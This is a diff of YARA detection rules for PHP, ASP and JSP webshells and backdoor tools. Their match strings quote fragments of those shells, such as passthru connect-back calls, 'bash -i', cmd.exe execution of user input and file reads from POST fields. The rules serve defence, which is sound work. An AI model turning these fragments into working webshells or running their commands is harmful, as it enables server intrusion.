-		$s2 = "if(isset($_POST[\"newcontent\"]))" fullword
-		$s3 = "foreach($parts as $val)//Assemble the path back together" fullword
-		$s7 = "$_POST[\"newcontent\"]=urldecode(base64_decode($_POST[\"newcontent\"]));" fullword
+		$s6 = "if((is_dir(\"$deldir/$file\")) AND ($file!=\".\") AND ($file!=\"..\"))"
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Webshells_Spygrup
+rule SIGNATURE_BASE_BIN_Client
 {
 	meta:
-		description = "PHP Webshells Github Archive - file spygrup.php"
+		description = "Webshells Auto-generated - file Client.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		id = "515ab1b3-7923-55de-8c19-71ef5d9b4366"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6390-L6404"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7578-L7594"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "12f9105332f5dc5d6360a26706cd79afa07fe004"
-		logic_hash = "5981f8cc1a98f799b1573cf73297383f995acf1c40f0227ac10302dc4d6fd6cc"
+		hash = "9f0a74ec81bc2f26f16c5c172b80eca7"
+		logic_hash = "e1277f6b7adc2e832a3aad96c7e44796596d2e61eb9247977da3c3569777e0b2"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "kingdefacer@msn.com</FONT></CENTER></B>\");" fullword
-		$s6 = "if($_POST['root']) $root = $_POST['root'];" fullword
-		$s12 = "\".htmlspecialchars($file).\" Bu Dosya zaten Goruntuleniyor<kingdefacer@msn.com>" fullword
-		$s18 = "By KingDefacer From Spygrup.org>" fullword
+		$s0 = "=====Remote Shell Closed====="
+		$s2 = "All Files(*.*)|*.*||"
+		$s6 = "WSAStartup Error!"
+		$s7 = "SHGetFileInfoA"
+		$s8 = "CreateThread False!"
+		$s9 = "Port Number Error"
 
 	condition:
-		3 of them
+		4 of them
 }
-rule SIGNATURE_BASE_Webshell_Web_Shell__C_Shankar
+rule SIGNATURE_BASE_Shelltools_G0T_Root_Uptime
 {
 	meta:
-		description = "PHP Webshells Github Archive - file Web-shell (c)ShAnKaR.php"
+		description = "Webshells Auto-generated - file uptime.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "966f5580-21c5-5ecf-b500-bde3d1ba4494"
+		id = "4f649757-9502-5640-bc17-11cad6c779f4"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6405-L6419"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7595-L7610"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3dd4f25bd132beb59d2ae0c813373c9ea20e1b7a"
-		logic_hash = "9d320eed18a5d76a87cee4ea0fa9caf08f096f7eeaab55420540aa082b596e0f"
+		hash = "d1f56102bc5d3e2e37ab3ffa392073b9"
+		logic_hash = "5d91dda859a63a965250bd4d76565c6adf18e4ee306be3b91965e5d35bc521e8"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "header(\"Content-Length: \".filesize($_POST['downf']));" fullword
-		$s5 = "if($_POST['save']==0){echo \"<textarea cols=70 rows=10>\".htmlspecialchars($dump"
-		$s6 = "write(\"#\\n#Server : \".getenv('SERVER_NAME').\"" fullword
-		$s12 = "foreach(@file($_POST['passwd']) as $fed)echo $fed;" fullword
+		$s0 = "JDiamondCSlC~"
+		$s1 = "CharactQA"
+		$s2 = "$Info: This file is packed with the UPX executable packer $"
+		$s5 = "HandlereateConso"
+		$s7 = "ION\\System\\FloatingPo"
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Ayyildiz_Tim___AYT__Shell_V_2_1_Biz
+rule SIGNATURE_BASE_Simple_PHP_Backdoor
 {
 	meta:
-		description = "PHP Webshells Github Archive - file Ayyildiz Tim  -AYT- Shell v 2.1 Biz.php"
+		description = "Webshells Auto-generated - file Simple_PHP_BackDooR.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fdd9bae9-80f3-5200-b922-e7d194009af8"
+		id = "bd7c19b9-e035-5e70-b626-1d210cadc055"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6420-L6434"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7611-L7624"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5fe8c1d01dc5bc70372a8a04410faf8fcde3cb68"
-		logic_hash = "2d096baad162c0e3e01732007a3be2804155e614a8fa4cd2d5dd3a7ac808fb49"
+		hash = "a401132363eecc3a1040774bec9cb24f"
+		logic_hash = "9739217c23f583452fbf1d7a8e20b2f1379ebf430e0a4fd73ad62e88d544670a"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s7 = "<meta name=\"Copyright\" content=TouCh By iJOo\">" fullword
-		$s11 = "directory... Trust me - it works :-) */" fullword
-		$s15 = "/* ls looks much better with ' -F', IMHO. */" fullword
-		$s16 = "} else if ($command == 'ls') {" fullword
+		$s0 = "<hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory he"
+		$s6 = "if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fn"
+		$s9 = "// a simple php backdoor"
 
 	condition:
-		3 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Gamma_Web_Shell
+rule SIGNATURE_BASE_Sig_2005Gray
 {
 	meta:
-		description = "PHP Webshells Github Archive - file Gamma Web Shell.php"
+		description = "Webshells Auto-generated - file 2005Gray.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "43b4fc9f-8897-5553-8846-29d307efa885"
+		id = "978fb04e-517d-51cf-98ca-5fd6b421365e"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6435-L6449"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7625-L7639"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7ef773df7a2f221468cc8f7683e1ace6b1e8139a"
-		logic_hash = "1de868c4948a95272d288aeba3ac38b84bf6b33ede6b3b600b32530c85586404"
+		hash = "75dbe3d3b70a5678225d3e2d78b604cc"
+		logic_hash = "927ed5cdaa14b6cd63a6ca7d7bec6635b69fa19d88808890e7d198fb7a0b57b4"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];" fullword
-		$s8 = "### Gamma Group <http://www.gammacenter.com>" fullword
-		$s15 = "my $error = \"This command is not available in the restricted mode.\\n\";" fullword
-		$s20 = "my $command = $self->query('command');" fullword
+		$s0 = "SCROLLBAR-FACE-COLOR: #e8e7e7;"
+		$s4 = "echo \"&nbsp;<a href=\"\"/\"&encodeForUrl(theHref,false)&\"\"\" target=_blank>\"&replace"
+		$s8 = "theHref=mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\"),2)"
+		$s9 = "SCROLLBAR-3DLIGHT-COLOR: #cccccc;"
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Webshells_Aspydrv
+rule SIGNATURE_BASE_Dllinjection
 {
 	meta:
-		description = "PHP Webshells Github Archive - file aspydrv.php"
+		description = "Webshells Auto-generated - file DllInjection.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		id = "8a57e122-fd00-57f3-94db-736c5bfd76db"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6450-L6465"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7640-L7651"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3d8996b625025dc549d73cdb3e5fa678ab35d32a"
-		logic_hash = "314fd671b163b9904cc78cb3a5858f5b1e3dfae9d520d5ebc545a7abd922e9f7"
+		hash = "a7b92283a5102886ab8aee2bc5c8d718"
+		logic_hash = "6e01ae1cc8a91a5e0d22bdf477aa72bf0116dbe31752a069b1e34d8a09ec6213"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Target = \"D:\\hshome\\masterhr\\masterhr.com\\\"  ' ---Directory to which files"
-		$s1 = "nPos = InstrB(nPosEnd, biData, CByteString(\"Content-Type:\"))" fullword
-		$s3 = "Document.frmSQL.mPage.value = Document.frmSQL.mPage.value - 1" fullword
-		$s17 = "If request.querystring(\"getDRVs\")=\"@\" then" fullword
-		$s20 = "' ---Copy Too Folder routine Start" fullword
+		$s0 = "\\BDoor\\DllInjecti"
 
 	condition:
-		3 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Jspwebshell_1_2_2
+rule SIGNATURE_BASE_Mithril_V1_45_Mithril
 {
 	meta:
-		description = "PHP Webshells Github Archive - file JspWebshell 1.2.php"
+		description = "Webshells Auto-generated - file Mithril.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "659f5c7d-0a9c-554d-a0ad-e3bcb8c5a1e9"
+		id = "3c160017-0332-532a-bb7f-390a4a34dc4e"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6466-L6481"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7652-L7664"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "184fc72b51d1429c44a4c8de43081e00967cf86b"
-		logic_hash = "41d937fce969a850a2e4e07eb168becc96a036317a78d620e812707be9466dfc"
+		hash = "f1484f882dc381dde6eaa0b80ef64a07"
+		logic_hash = "a3e74bfb34762553eccaddd745d9e17dc3a5a25201e4bc9e2ea9a49342295c78"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "System.out.println(\"CreateAndDeleteFolder is error:\"+ex); " fullword
-		$s3 = "<%@ page contentType=\"text/html; charset=GBK\" language=\"java\" import=\"java."
-		$s4 = "// String tempfilepath=request.getParameter(\"filepath\");" fullword
-		$s15 = "endPoint=random1.getFilePointer();" fullword
-		$s20 = "if (request.getParameter(\"command\") != null) {" fullword
+		$s2 = "cress.exe"
+		$s7 = "\\Debug\\Mithril."
 
 	condition:
-		3 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_G00Nshell_V1_3
+rule SIGNATURE_BASE_Hkshell_Hkrmv
 {
 	meta:
-		description = "PHP Webshells Github Archive - file g00nshell-v1.3.php"
+		description = "Webshells Auto-generated - file hkrmv.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "61a09576-7e62-5a30-a52c-492b81b96322"
+		id = "986fad12-9198-5e0a-88d6-a9be6963ff8c"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6482-L6497"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7665-L7677"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "70fe072e120249c9e2f0a8e9019f984aea84a504"
-		logic_hash = "2ecb3ce2aa43a99552fb26e610c35bdb04f4ff0dc75c867e4327d6e27eed0177"
+		hash = "bd3a0b7a6b5536f8d96f50956560e9bf"
+		logic_hash = "f1da0778456272e6d93633a564018bdf0fa74f1db1c9e963a03a59c69c752b6e"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s10 = "#To execute commands, simply include ?cmd=___ in the url. #" fullword
-		$s15 = "$query = \"SHOW COLUMNS FROM \" . $_GET['table'];" fullword
-		$s16 = "$uakey = \"724ea055b975621b9d679f7077257bd9\"; // MD5 encoded user-agent" fullword
-		$s17 = "echo(\"<form method='GET' name='shell'>\");" fullword
-		$s18 = "echo(\"<form method='post' action='?act=sql'>\");" fullword
+		$s5 = "/THUMBPOSITION7"
+		$s6 = "\\EvilBlade\\"
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Winx_Shell_2
+rule SIGNATURE_BASE_WEBSHELL_PHP_1
 {
 	meta:
-		description = "PHP Webshells Github Archive - file WinX Shell.php"
+		description = "Webshells Auto-generated - file phpshell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ebad4f2e-96c3-5cb7-b228-de3a6a39ae55"
+		id = "d0107af3-e484-54cf-a238-dd1e71efd3f6"
 		date = "2025-03-29"
 		modified = "2025-03-29"
-		old_rule_name = "WebShell_WinX_Shell"
+		old_rule_name = "phpshell"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6498-L6514"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7678-L7692"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a94d65c168344ad9fa406d219bdf60150c02010e"
-		logic_hash = "f953c297763e41d197ce186dc818b656951dfa8c855c5063fc4abb54eeefc7bb"
+		hash = "1dccb1ea9f24ffbd085571c88585517b"
+		logic_hash = "eed450ae6668bbee01ea2689e9864f10a66714ec4c91afabb12609ad4ebdac8c"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "// It's simple shell for all Win OS." fullword
-		$s5 = "//------- [netstat -an] and [ipconfig] and [tasklist] ------------" fullword
-		$s6 = "<html><head><title>-:[GreenwooD]:- WinX Shell</title></head>" fullword
-		$s13 = "// Created by greenwood from n57" fullword
-		$s20 = " if (is_uploaded_file($userfile)) {" fullword
+		$s1 = "echo \"<input size=\\\"100\\\" type=\\\"text\\\" name=\\\"newfile\\\" value=\\\"$inputfile\\\"><b"
+		$s2 = "$img[$id] = \"<img height=\\\"16\\\" width=\\\"16\\\" border=\\\"0\\\" src=\\\"$REMOTE_IMAGE_UR"
+		$s3 = "$file = str_replace(\"\\\\\", \"/\", str_replace(\"//\", \"/\", str_replace(\"\\\\\\\\\", \"\\\\\", "
 
 	condition:
-		3 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_PHANTASMA
+rule SIGNATURE_BASE_FSO_S_Cmd
 {
 	meta:
-		description = "PHP Webshells Github Archive - file PHANTASMA.php"
+		description = "Webshells Auto-generated - file cmd.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b36a7dbb-7d40-5fca-8409-c8822298005c"
+		id = "f7a74f21-aec9-5ee7-a80e-0fe34b977a71"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6515-L6529"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7693-L7705"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "cd12d42abf854cd34ff9e93a80d464620af6d75e"
-		logic_hash = "355be62807182f9a53bac20a6dead8f0a3bee83b6bdc4566502c157f16076b9b"
+		hash = "cbe8e365d41dd3cd8e462ca434cf385f"
+		logic_hash = "43f3379a57210f0e3b70575313115a7ba3d71359de7c5ac9a6a178b93af3545e"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s12 = "\"    printf(\\\"Usage: %s [Host] <port>\\\\n\\\", argv[0]);\\n\" ." fullword
-		$s15 = "if ($portscan != \"\") {" fullword
-		$s16 = "echo \"<br>Banner: $get <br><br>\";" fullword
-		$s20 = "$dono = get_current_user( );" fullword
+		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>"
+		$s1 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)"
 
 	condition:
-		3 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Webshells_Cw
+rule SIGNATURE_BASE_Felikspack3___PHP_Shells_Phpft
 {
 	meta:
-		description = "PHP Webshells Github Archive - file cw.php"
+		description = "Webshells Auto-generated - file phpft.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		id = "00bc690b-4977-5076-a40a-edd39c37233f"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6530-L6546"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7706-L7718"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e65e0670ef6edf0a3581be6fe5ddeeffd22014bf"
-		logic_hash = "52bfb14f4d5d3df787ce7782cbbee25ea1556758eed48e3001c8a3f35a541526"
+		hash = "60ef80175fcc6a879ca57c54226646b1"
+		logic_hash = "741536acafdc4da618d69bdae2f0a3e8c004a4027cc76c796158ee111c006414"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "// Dump Database [pacucci.com]" fullword
-		$s2 = "$dump = \"-- Database: \".$_POST['db'] .\" \\n\";" fullword
-		$s7 = "$aids = passthru(\"perl cbs.pl \".$_POST['connhost'].\" \".$_POST['connport']);" fullword
-		$s8 = "<b>IP:</b> <u>\" . $_SERVER['REMOTE_ADDR'] .\"</u> - Server IP:</b> <a href='htt"
-		$s14 = "$dump .= \"-- Cyber-Warrior.Org\\n\";" fullword
-		$s20 = "if(isset($_POST['doedit']) && $_POST['editfile'] != $dir)" fullword
+		$s6 = "PHP Files Thief"
+		$s11 = "http://www.4ngel.net"
 
 	condition:
-		3 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Include_W_Shell
+rule SIGNATURE_BASE_FSO_S_Indexer
 {
 	meta:
-		description = "PHP Webshells Github Archive - file php-include-w-shell.php"
+		description = "Webshells Auto-generated - file indexer.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a80ca446-6612-51b4-99a7-8a8d8e6ee196"
+		id = "fba053d7-5413-563f-8c27-0554349500b2"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6547-L6560"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7719-L7730"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1a7f4868691410830ad954360950e37c582b0292"
-		logic_hash = "2be144060d4fdaee38214dc2eba80c2a6fd3699060d274e66356fd5a08c9be4b"
+		hash = "135fc50f85228691b401848caef3be9e"
+		logic_hash = "a1bfba9c24819f5c1574aa179d853a6cc2fcf58c7b9a14eeab2639248178549c"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s13 = "# dump variables (DEBUG SCRIPT) NEEDS MODIFINY FOR B64 STATUS!!" fullword
-		$s17 = "\"phpshellapp\" => \"export TERM=xterm; bash -i\"," fullword
-		$s19 = "else if($numhosts == 1) $strOutput .= \"On 1 host..\\n\";" fullword
+		$s3 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input type=\"r"
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Mysql_Tool
+rule SIGNATURE_BASE_R57Shell
 {
 	meta:
-		description = "PHP Webshells Github Archive - file mysql_tool.php"
+		description = "Webshells Auto-generated - file r57shell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a22a0a5c-a686-517e-b1f9-279edab0616b"
+		id = "1f1070e8-e82c-5cae-a64a-cd5028adae97"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6561-L6573"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7731-L7742"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c9cf8cafcd4e65d1b57fdee5eef98f0f2de74474"
-		logic_hash = "611636b3fa9a3163574b18cf8eacebea9733a1ad381261387f79a532b003e8fd"
+		hash = "8023394542cddf8aee5dec6072ed02b5"
+		logic_hash = "40ff6bceb3f9bd95fbf5e75681fadadaa64243007e10fcc86bb909282b8161c5"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s12 = "$dump .= \"-- Dumping data for table '$table'\\n\";" fullword
-		$s20 = "$dump .= \"CREATE TABLE $table (\\n\";" fullword
+		$s11 = " $_POST['cmd']=\"echo \\\"Now script try connect to"
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Phpspy_Ver_2006
+rule SIGNATURE_BASE_Bdcli100
 {
 	meta:
-		description = "PHP Webshells Github Archive - file PhpSpy Ver 2006.php"
+		description = "Webshells Auto-generated - file bdcli100.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "adbb1963-31c8-5540-a679-c75b1101c163"
+		id = "c74e8822-9556-5596-a130-c6e0120d7103"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6574-L6588"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7743-L7755"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "34a89e0ab896c3518d9a474b71ee636ca595625d"
-		logic_hash = "69bd2c387b0e676168116f3b3c3c081e08fd555cc6bc9a94b9c8ef97f194b09f"
+		hash = "b12163ac53789fb4f62e4f17a8c2e028"
+		logic_hash = "48c70413c71d5a84f8cea48c77935b7cc26d9e1348d7ab257de4540d69f0f817"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "var_dump(@$shell->RegRead($_POST['readregname']));" fullword
-		$s12 = "$prog = isset($_POST['prog']) ? $_POST['prog'] : \"/c net start > \".$pathname."
-		$s19 = "$program = isset($_POST['program']) ? $_POST['program'] : \"c:\\winnt\\system32"
-		$s20 = "$regval = isset($_POST['regval']) ? $_POST['regval'] : 'c:\\winnt\\backdoor.exe'"
+		$s5 = "unable to connect to "
+		$s8 = "backdoor is corrupted on "
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Zyklonshell
+rule SIGNATURE_BASE_Hytop_Devpack_2005Red
 {
 	meta:
-		description = "PHP Webshells Github Archive - file ZyklonShell.php"
+		description = "Webshells Auto-generated - file 2005Red.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4d7ff3e5-4940-52c8-b045-5db1523f70c2"
+		id = "963effd9-f31d-5238-9419-b5dd11822e56"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6589-L6603"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7756-L7769"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3fa7e6f3566427196ac47551392e2386a038d61c"
-		logic_hash = "5d49f2599781836156f6bbb0c50cfcffdb2ca51c7cb688abbc6245d7f856ad01"
+		hash = "d8ccda2214b3f6eabd4502a050eb8fe8"
+		logic_hash = "716b6faa8d1216f592d63b658cdd65d7be0226bf746b5fdf1827bdf881562711"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "The requested URL /Nemo/shell/zyklonshell.txt was not found on this server.<P>" fullword
-		$s1 = "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">" fullword
-		$s2 = "<TITLE>404 Not Found</TITLE>" fullword
-		$s3 = "<H1>Not Found</H1>" fullword
+		$s0 = "scrollbar-darkshadow-color:#FF9DBB;"
+		$s3 = "echo \"&nbsp;<a href=\"\"/\"&encodeForUrl(theHref,false)&\"\"\" target=_blank>\"&replace"
+		$s9 = "theHref=mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\"),2)"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Webshells_Myshell_2
+rule SIGNATURE_BASE_Hytop2006_Rar_Folder_2006X2
 {
 	meta:
-		description = "PHP Webshells Github Archive - file myshell.php"
+		description = "Webshells Auto-generated - file 2006X2.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		id = "bda89055-27f5-50b7-86a3-2c75a5f3eadc"
 		date = "2025-03-29"
 		modified = "2025-03-29"
-		old_rule_name = "WebShell_php_webshells_myshell"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6604-L6619"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7770-L7782"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5bd52749872d1083e7be076a5e65ffcde210e524"
-		logic_hash = "7765e43189d6ec0cda0b58d00cfd7fc8cec89287dbac7487083b6ce1ce55f306"
+		hash = "cc5bf9fc56d404ebbc492855393d7620"
+		logic_hash = "0df587ccaf41d11c6be90ef631ce8b21f95f08fa8f71e62463c378455b312f4a"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "if($ok==false &&$status && $autoErrorTrap)system($command . \" 1> /tmp/outpu"
